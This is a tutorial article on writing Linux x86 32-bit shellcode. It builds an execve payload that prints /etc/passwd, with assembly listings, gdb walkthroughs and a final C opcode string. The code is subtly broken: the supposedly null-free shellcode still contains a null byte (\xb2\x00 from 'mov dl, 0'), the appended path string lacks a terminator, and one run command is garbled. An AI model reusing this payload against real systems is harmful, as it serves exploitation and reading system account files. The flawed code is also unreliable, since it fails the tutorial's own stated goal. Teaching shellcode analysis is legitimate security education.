Most of the programs that we use every day contain bugs; a bug is a malfunction in a program, which can make the program take unwanted actions or errors. These bugs or vulnerabilities can be exploited by writing a code that is usually called an exploit. The most common types of vulnerabilities are those that concern the corruption of memory as buffer overflows, the heap overflows, race conditions, format string attacks, etc… In this article, we won’t learn to write an exploit, we will not even see how to search for a vulnerability in a software, but we will see how to write and analyze shellcode and the relationship with the above.
The shellcode is generally regarded as a program that starts a shell, and is used as the payload of the exploit. In reality, one shellcode can do everything that makes a normal program. The shellcode is executed after the vulnerability has been exploited.
In this article, we will analyze and write shellcode for Linux x86 32-bit architectures.
I pointed out the type of architecture, that is because shellcode is usually written in assembly language, and each processor family has its own set of instructions. In addition, each operating system has its own system calls to make service requests to the kernel.
To make a system call using the int 0x80 instruction, the kernel then checks the value of the EAX register to take the number of the system call. Each system call is identified by a unique number that the kernel recognizes.
We look at the system call in Linux, they are located (in Ubuntu) in the following file:
It’s time to start!
Let’s write our first shellcode – I have chosen to write a fairly simple, so as to better understand the steps necessary to analyze and optimize it. What we need is to write shellcode that should display the command “cat” the contents of the file /etc/passwd file (this file contains some information about the system account).
;/bin/cat /etc/passwdsection .data cmd db '/bin/cat', 0 file db '/etc//passwd' section .text global _start _start: ; execve("/bin/cat",["/bin/cat", "/etc//passwd"], NULL) mov eax, 11 mov edx, 0 mov ebx,cmd push edx mov ecx,file push ecx push ebx mov ecx,esp int 80h
To run the program, and then view the contents of the file /etc/passwd, you must:
$ nasm -f elf shellcode00.asm $ ld -o shellcode00 shellcode00.o $ ,/ shellcode00
As expected, the shellcode shows the contents of the passwd file. But look at what has been written, the code consists of the section “.data” and the section “text”; the segment data contains the variable declarations cmd and file, and the code segment contains the code required to run the command “cat /etc/passwd”. In particular, it uses the execve system call, which in Linux is used to execute a program. The first argument is a pointer to the string “/bin/cat”, which is the program you want to execute, the second argument (the array index) contains the program to execute bit “/bin/cat” and the argument passed “/etc//passwd”, the third and final argument is empty, but must be terminated with a null pointer to 32 bits.
The first statement that we meet “mov eax, 11”, the number 11 is the number of system calls.
We now start debugging with gdb
Now we follow step by step until instruction: “mov ecx, esp” and let us examine the registers ebx and ecx
We note that the ebx register contains the address of the string “/bin/cat”, while the ecx register contains the address of the string “/etc//passwd”, we also have to take a look at the stack:
After the instruction “mov ecx, esp”, as you can see from the stack, the ecx register will contain just addresses “/bin/cat”and “/etc//passwd”.
In the code we’ve written, there are some major problems; the first problem is that segment of the data, as you could guess the schellcode once it has been injected into a running program, it must have the code independent of the position of the variables in memory to run correctly. So the next step is that of delete the data segment,. To do this, use the following instructions:
jmp end start: pop ecx end: call start db '/etc//passwd'
This method solves the problem by putting the string immediately after the call instruction, its address is pushed onto the stack, after the pop instruction extracts the address from the stack and places it in a register, in our case the ecx register.
Considering the above, we make the change to the code (create new file shellcode01.asm), as seen below:
BITS 32 jmp end start: ; execve("/bin/cat",["/bin/cat", "/etc//passwd"], NULL) pop ecx mov eax, 11 mov edx, 0 push 0 push dword 0x7461632f push dword 0x6e69622f mov ebx,esp push edx push ecx push ebx mov ecx,esp int 80h end: call start db '/etc//passwd'
BITS 32 indicates to nams that the code we're going to run a 32-bit code, note that I decided to write /bin/cat with the instructions:
push dword 0x7461632f ; /cat push dword 0x6e69622f ; /bin
Then run the program (debugging with gdb) until the instruction "mov ecx, esp"
As you can see in the image above, the esp register contains the address of the string "/bin/cat" and the string "/etc/passwd", after the instruction mov ecx, esp, the ecx register will contain just the second argument of execve function.
Let us now turn to the second problem which is that of the null byte, and then examine the disassembly of the binary file to see if there are any in our code
As you can see, there are null bytes in the following lines:
8048063: b8 0b 00 00 00 mov $0xb,%eax 8048068: ba 0000 00 00 mov $0x0,%edx
This is because the registers eax, and edx are 32-bit, and really just an 8-bit register for the operation, in fact, using the 8-bit registers al the dl, possesses the least significant byte in the current registry avoiding null bytes in the machine code
8048069: b0 0b mov $0xb,%al 804806b: b2 00 mov $0x0,%dl
Before doing this, however, you have to reset the registers and you can safely use the instruction "xor"(since they have no effect on the flag of the processor).
Then fill the complete code (create new file shellcode02.asm):
BITS 32 jmp end start: ; execve("/bin/cat",["/bin/cat", "/etc//passwd"], NULL) pop ecx xor eax,eax xor edx,edx xor ebx,ebx mov al, 11 mov dl, 0 push ebx push dword 0x7461632f push dword 0x6e69622f mov ebx,esp push edx push ecx push ebx mov ecx,esp int 80h end: call start db '/etc//passwd'
Finally place the code that shows the instructions with the corresponding opcode:
$ nasm -f elf shellcode02.asm $ ld -o shellcode02 shellcode02.o
Then we can write our shellcode in the form that we are used to seeing, as shown below:
char shellcode ="\xeb\x1f\x59\x31\xc0\x31\xd2\x31\xdb\xb0\x0b\xb2\x00" "\x53\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3" "\x52\x51\x53\x89\xe1\xcd\x80\xe8\xdc\xff\xff\xff\x2f" "\x65\x74\x63\x2f\x2f\x70\x61\x73\x73\x77\x64";
At this point we have a fully functional piece of shellcode that outputs to /etc/passwd.
As we have seen, the assembly language is the heart of an effective and efficient shellcode. Shellcode is therefore often created to target one specific combination of processors, operating systems and service packs, called a platform. For some exploits, due to the constraints put on the shellcode by the target process, a very specific shellcode must be created. However, it is not impossible for one shellcode to work for multiple exploits, service packs, operating systems and even processors .
Therefore, if you are familiar with assembly language and architecture of operating systems, there is no barrier that could limit our imagination.